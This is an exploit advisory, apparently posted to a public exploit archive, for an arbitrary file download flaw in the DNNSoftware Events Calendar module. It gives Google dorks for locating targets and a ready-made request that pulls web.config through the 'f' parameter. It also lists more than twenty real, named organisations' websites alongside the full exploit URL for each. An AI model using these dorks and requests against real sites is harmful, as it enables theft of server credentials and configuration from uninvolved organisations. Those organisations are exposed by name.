####################################################################

# Exploit Title : DNNSoftware EventsCalendar Modules 1.x Arbitrary File
Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : dnnsoftware.com
# Software Information Link :
store.dnnsoftware.com/home/product-details/events-calendar
# Software Version : 1.x and All Versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Copyright 2019 by Associated Builders and
Contractors''
inurl:''/desktopmodules/eventscalendar/''
# Vulnerability Type : CWE-16  [ Configuration ]

####################################################################

# Description :
*************

* Events Calendar is a calendar to add and display events with time and
description in rich text editor.

* DotNetNuke DNNSoftware Events Calendar Modules 1.x and other versions

is prone to a vulnerability that lets attackers download arbitrary files
because

the application fails to sufficiently verify user-supplied input.

* This may allow an attacker to gain access to sensitive information, which
may aid in launching further attacks.

* The attacker can download and read all and any files known by the name
via '?f=' parameter.

# Arbitrary File Download Exploit :
*******************************

/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

/desktopmodules/eventscalendar/downloaddoc.aspx?f=[DOWNLOAD-ANY-FILE]

####################################################################

# Example Vulnerable Sites :
*************************

Note : (38.95.37.77) => There are 73 domains hosted on this server.

[+] abcga.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcgmc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] mnabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+]
abclaventura.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+]
abccarolinas.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcnjc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcpnw.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+]
abcwestwa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+]
abc-chesapeake.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] ocl.net/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+]
aeawave.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] tkhobby.nu/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcark.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+]
av-warehouse.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] nocabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] ezt.ca/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+]
abccentralcal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcwpa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+]
abcnevada.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+]
abcsocal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] ctabc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+]
abcalaska.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+]
abcfirstcoast.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################